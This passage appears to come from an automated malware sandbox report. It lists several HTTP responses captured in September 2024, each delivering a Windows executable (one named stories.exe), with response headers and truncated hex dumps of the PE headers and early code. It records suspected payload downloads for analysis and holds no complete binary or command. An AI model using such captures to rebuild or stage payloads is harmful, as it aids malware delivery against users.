5c 57 bf ea bf cf 2c a7 28 b6 c7 50 cc 17 26 60 4c 06 09 3f 5a ef c4 4a 2c 79 fd 3a a0 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:09 GMTContent-Type: application/x-msdos-programContent-Length: 425984Connection: keep-aliveLast-Modified: Sat, 24 Aug 2024 17:17:20 GMTETag: "68000-620711078a800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a0 15 ca 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 45 d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 00 06 00 8c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 3c 4c 00 00 e0 90 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 91 05 00 18 00 00 00 18 91 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 c8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0a e5 04 00 00 10 00 00 00 e6 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 38 10 01 00 00 00 05 00 00 12 01 00 00 ea 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 66 00 00 00 20 06 00 00 34 00 00 00 fc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 4c 00 00 00 a0 06 00 00 4e 00 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:12 GMTContent-Type: application/octet-streamContent-Length: 192000Last-Modified: Sat, 24 Aug 2024 14:58:01 GMTConnection: keep-aliveETag: "66c9f4f9-2ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 a9 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 23 00 80 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 ee ce 00 00 00 e0 01 00 00 d0 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 94 2b 21 00 00 b0 02 00 00 0c 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2a 44 00 00 00 e0 23 00 00 46 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Fri, 27 Sep 2024 02:21:14 GMTContent-Type: application/octet-streamContent-Length: 3247089Connection: keep-aliveX-Powered-By: PHP/7.4.33Content-Description: File TransferContent-Disposition: attachment; filename=stories.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 00 b0 00 00 00 04 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 90 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:15 GMTContent-Type: application/octet-streamContent-Length: 4278784Last-Modified: Thu, 12 Sep 2024 13:56:06 GMTConnection: keep-aliveETag: "66e2f2f6-414a00"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ba 08 00 00 8c 38 00 00 00 00 00 4c c9 08 00 00 10 00 00 00 d0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 41 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 09 00 78 22 00 00 00 20 0a 00 00 82 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 40 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 b9 08 00 00 10 00 00 00 ba 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 20 2d 00 00 00 d0 08 00 00 2e 00 00 00 be 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 01 0f 00 00 00 00 09 00 00 00 00 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 78 22 00 00 00 10 09 00 00 24 00 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 09 00 00 00 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 50 09 00 00 02 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 40 b5 00 00 00 60 09 00 00 b6 00 00 00 12 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 82 37 00 00 20 0a 00 00 82 37 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 41 00 00 00 00 00 00 4a 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:21 GMTContent-Type: application/octet-streamContent-Length: 419328Last-Modified: Thu, 26 Sep 2024 16:40:28 GMTConnection: keep-aliveETag: "66f58e7c-66600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b d9 e1 fd 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 4a 06 00 00 1a 00 00 00 00 00 00 ae 68 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 06 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 68 06 00 4b 00 00 00 00 80 06 00 f4 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 48 06 00 00 20 00 00 00 4a 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f4 16 00 00 00 80 06 00 00 18 00 00 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 06 00 00 02 00 00 00 64 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 68 06 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 5b 03 00 a0 aa 02 00 03 00 00 00 dd 04 00 06 ac 05 06 00 c0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 2e 28 05 05 00 06 28 01 00 00 06 2a 1b 30 09 00 ce 05 00 00 01 00 00 11 00 73 0d 00 00 0a 0a 00 00 02 7e 05 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 26 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 10 00 00 0a 0b 38 5b 05 00 00 07 6f 11 00 00 0a 0c 00 08 17 17 1a 8d 0b 00 00 01 25 16 1f 46 7e 32 03 00 04 28 bf 05 00 06 a2 25 17 1f 47 7e 32 03 00 04 28 bf 05 00 06 a2 25 18 1f 48 7e 32 03 00 04 28 bf 05 00 06 a2 25 19 1f 65 7e 32 03 00 04 28 bf 05 00 06 a2 7e 33 03 00 04 28 c3 05 00 06 0d 00 09 6f 12 00 00 0a 13 04 38 d4 04 00 00 12 04 28 13 00 00 0a 13 05 73 1a 00 00 06 13 06 00 73 e1 03 00 06 13 07 11 06 7e 14 00 00 0a 7d 02 00 00 04 7e 14 00 00 0a 13 08 00 11 06 11 05 73 15 00 00 0a 28 16 00 00 0a 6f 17 00 00 0a 7d 02 00 00 04 11 06 7b 02 00 00 04 1f 49 7e 32 03 00 04 28 bf 05 00 06 6f 18 00 00 0a 13 09 11 09 39 15 00 00 00 00 1f 49 7e 32 03 00 04 28 bf 05 00 06 13 08 00 38 43 00 00 00 00 11 05 1f 1
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
